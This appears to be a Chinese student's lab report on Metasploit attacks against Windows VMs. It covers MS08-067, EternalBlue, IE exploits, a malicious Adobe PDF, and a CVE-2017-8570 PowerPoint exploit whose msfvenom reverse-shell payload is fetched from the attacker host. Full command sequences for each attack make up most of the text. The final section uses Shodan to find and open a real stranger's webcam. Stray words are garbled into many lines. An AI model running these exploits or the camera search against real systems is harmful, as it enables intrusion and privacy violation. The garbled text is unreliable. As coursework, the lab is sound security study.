返回目錄html
返回目錄python
用本身的話解釋什麼是exploit
,payload
,encode
。linux
- exploit:利用漏洞,達到攻擊控制受害機的一種手段
- payload:載荷,含有執行攻擊的代碼,來實現任何運行在受害者環境中的程序所能作的事情
- encode:對攻擊代碼進行假裝,使其能正常運行並儘可能免殺
返回目錄git
關於MSFgithub
滲透攻擊模塊(Exploit Modules)
、輔助模塊(Auxiliary Modules)
、攻擊載荷(Payload Modules)
、空字段模塊(Nop Modules)
、編碼模塊(Encoders)
、後滲透攻擊模塊(Post)
/usr/share/metasploit-framework/modules
info
查看其信息,觀察其要設置的信息(帶yes的爲須要設置的,如有默認值則不用 設)、能夠攻擊的靶機(target)msfconsole
啓動:web
service postgresql start armitage
connect
、yes
search cve:2018 type:exploit platform:windows
(cve後爲漏洞年份)help search
查看命令格式攻擊瀏覽器,獲取系統控制權sql
use exploit/windows/browser/ie_setmousecapture_uaf info 設置參數 payload options exploit 上鉤後 use auxiliray/server/browser_autopwn
攻擊Adobe Readershell
use exploit/windows/fileformat/adobe_cooltype_sing info search type:exploit name:Excel platform:windows
返回目錄windows
攻擊方:kali
10.0.0.217
靶機:Win2kServer_SP0_target10.0.0.112
api
ms08_067_netapi是一款Metasploit中有點老的溢出攻擊載荷,攻擊者利用受害者主機默認開放的SMB服務端口445,發送惡意資料到這個端口,經過MSRPC接口調用server服務的一個函數,並破壞程序的棧緩存區,得到遠程代碼執行權限,從而徹底控制主機。
Hosts
-Nmap Scan
-Quick Scan(OS detect)
(能夠自動探測目標主機的操做系統)Services
,查看靶機上開啓的服務,有以下服務:Scan
(Armitage會調用Metasploit的漏洞掃描模塊,定向掃描靶機,尋找存在的漏洞,爲下一步肯定攻擊方法提供參考依據)Attacks
-Find Attacks
,Armitage會自動尋找合適的攻擊模塊,結束會出現下圖Attack
-smb
-check exploits
檢測哪些漏洞是存在的Attack
-smb
-ms08_067_netapi
自動攻擊,設置端口爲5330
,標記Use a reverse connection
,點擊Launch
下面咱們進入console
手動換一種payload
use exploit/windows/smb/ms08_067_netapi //選擇攻擊模塊 set payload generic/shell_reverse_tcp //選擇攻擊載荷 show options //查看配置信息 show targets //查看可攻擊的平臺 set RHOST 10.0.0.112 //設置靶機IP,端口默認爲445 set LPORT 5330 //成功後回連主機端口5330 set LHOST 10.0.0.217 //設置攻方IP set target 1 //這裏爲win2k(可經過「show targets」查看可攻擊的平臺) exploit //發起滲透攻擊
shell 1
- interact
,先輸入run
在輸入dir
查看目錄信息使用msfconsole
效果以下
攻擊方:
kali 10.0.0.138
靶機:Windows7 x64 10.0.0.216
永恆之藍漏洞是方程式組織在其漏洞利用框架中一個針對SMB服務進行攻擊的漏洞,該漏洞致使攻擊者在目標系統上能夠執行任意代碼。(SMB服務的做用:該服務在Windows與UNIX系列OS之間搭起一座橋樑,讓二者的資源可互通有無。)
msfconsole
經過search MS17_010 platform:windows
查看其可用模塊,咱們選擇第一個exploit/windows/smb/ms17_010_eternalblue
輸入如下命令
use exploit/windows/smb/ms17_010_eternalblue //選擇攻擊模塊 show payloads //顯示可用攻擊載荷 set payload windows/x64/meterpreter/reverse_tcp //設置tcp反向鏈接 info //查看須要配置的信息及可攻擊的target set RHOST 10.0.0.216 //設置靶機IP set LHOST 10.0.0.138 //kali IP set LPORT 5330 //設置攻擊端口 set target 0 //設置win7靶機 exploit //發起滲透攻擊
查看IP驗證在繼續後面的命令操做
攻擊方:
kali 10.0.0.138
靶機:Windows7 x64 10.0.0.216
瀏覽器:IE 8.0
kali中輸入msfconsole
進入控制檯,依次輸入如下指令
use windows/browser/ms11_050_mshtml_cobjectelement //選擇攻擊模塊 set payload windows/meterpreter/reverse_http //設置http反向鏈接 set SRVHOST 10.0.0.138 //設置靶機要回連的IP地址 set LHOST 10.0.0.138 //kali IP set LPORT 5330 //設置攻擊端口 set URIPATH 20165330zyx //統一資源標識符路徑設置 exploit //發起滲透攻擊
http://10.0.0.138:8080/20165330zyx
,IE出現警告彈窗,提示關閉程序msfconsole
這邊,沒啥反應工具
-Internet選項
,修改以下安全設置在進到地址,這回提示運行不正常的加載項或惡意加載項致使 Internet Explorer 關閉此網頁
攻擊方:
kali 10.0.0.138
靶機:WindowsXP 10.0.0.171
瀏覽器:IE 8.0
此安全更新可解決 Microsoft Windows 對象連接與嵌入 (OLE) 中 2 個私下報告的漏洞。最嚴重的漏洞可能在用戶使用 Internet Explorer 查看經特殊設計的網頁時容許遠程執行代碼。成功利用這些漏洞的攻擊者能夠在當前用戶的上下文中運行任意代碼。若是當前用戶使用管理用戶權限登陸,則攻擊者可隨後安裝程序;查看、更改或刪除數據;或者建立擁有徹底用戶權限的新賬戶。遠程攻擊者利用此漏洞經過構造的網站執行任意代碼,影響Win95+IE3 – Win10+IE11全版本。
msfconsole
經過search ms14_064 platform:windows
查看可選攻擊模塊,這裏選用exploit/windows/browser/ms14_064_ole_code_execution
執行如下命令
use exploit/windows/browser/ms14_064_ole_code_execution //選擇攻擊模塊 show payloads //顯示可用攻擊載荷 set payload windows/meterpreter/reverse_tcp //設置tcp反向鏈接 info //查看詳細信息(發現可攻擊winXP和win7) set SRVHOST 10.0.0.138 //設置攻方IP set AllowPowerShellPrompt true //由於msf中自帶的漏洞利用exp調用的是 powershell。 因此msf中的exp代碼只對安裝powershell的系統生效 set LHOST 10.0.0.138 set LPORT 5330 set target 0 //設置winXP靶機 exploit //發起滲透攻擊
此時能夠用ctrl+c
退出當前狀態,經過輸入sessions -i 1
獲取第一個會話鏈接,並輸入ipconfig
驗證是否爲靶機地址
攻擊方:
kali 10.0.0.138
靶機:WindowsXP 10.0.0.171
Adobe Reader:9.3.0
kali輸入msfconsole
進入控制檯,依次輸入如下命令
use windows/fileformat/adobe_cooltype_sing //選擇攻擊模塊 set payload windows/meterpreter/reverse_tcp //設置tcp反向鏈接 set LHOST 10.0.0.138 //kali IP set LPORT 5330 //設置攻擊端口 set FILENAME 5330.pdf //設置生成的pdf文件名 exploit //發起攻擊此時生成
5330.pdf
,咱們進入保存目錄cd /root/.msf4/local
,輸入cp 5330.pdf /mnt/hgfs/vm
複製到共享文件夾中,在移到windowsXP虛擬機中控制檯中輸入back
退出當前模塊,輸入如下命令進入監聽模塊:
use exploit/multi/handler //進入監聽模塊 set payload windows/meterpreter/reverse_tcp //設置tcp反向鏈接 set LHOST 10.0.0.138 //kali IP set LPORT 5330 //設置攻擊端口 exploit //監聽
ipconfig
確認是否會連正確發現無誤,就能夠繼續後續的命令操做了
攻擊方:
kali 10.0.0.138
靶機:WindowsXP 10.0.0.216
Microsoft Office:2016 (64-bit edition)
- 2017年7月,微軟在例行的月度補丁中修復了多個Microsoft Office漏洞,其中的CVE-2017-8570漏洞爲一個邏輯漏洞,利用方法簡單。網上已經出現該漏洞的利用代碼,影響範圍較廣。
- 該漏洞爲Microsoft Office的一個遠程代碼執行漏洞。其成因是Microsoft PowerPoint執行時會初始化Script」Moniker對象,而在PowerPoint播放動畫期間會激活該對象,從而執行sct腳本(Windows Script Component)文件。攻擊者能夠欺騙用戶運行含有該漏洞的PPT文件,致使獲取和當前登陸用戶相同的代碼執行權限。
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://10.0.0.138/logo.doc
(IP爲攻方IP)No such file or directory: 'template/template.ppsx'
,只要在裏面建立文件夾template
,將template.ppsx
挪到template
裏便可成功。msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.138 LPORT=5330 -f exe > shell.exe
(由於個人win7爲64位命令中須要加入x64,IP爲攻方IP)python cve-2017-8570_toolkit.py -M exp -e http://10.0.0.138/shell.exe -l shell.exe
進入msfconsole
監聽
use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 10.0.0.138 set LPORT 5330 exploit
Invoice.ppsx
傳至安裝有Microsoft Office 2016的win7上,並打開該文件發現回連成功
msfconsole
中可經過命令show auxiliary
查看全部的輔助模塊gather/shodan_search
,使用shodan來搜索網絡攝像頭shodan
use auxiliary/gather/shodan_search
show options
set SHODAN_APIKEY tPZf7UpklnPZ*********JFz567WYbt
set QUERY "webcamXP"
run
[*] Auxiliary module execution completed
顯示IP:Port
,複製到瀏覽器中看看可不能夠看到畫面(選了一個Slovenia斯洛文尼亞共和國地方的。。。總以爲有點恐怖。。)參考資料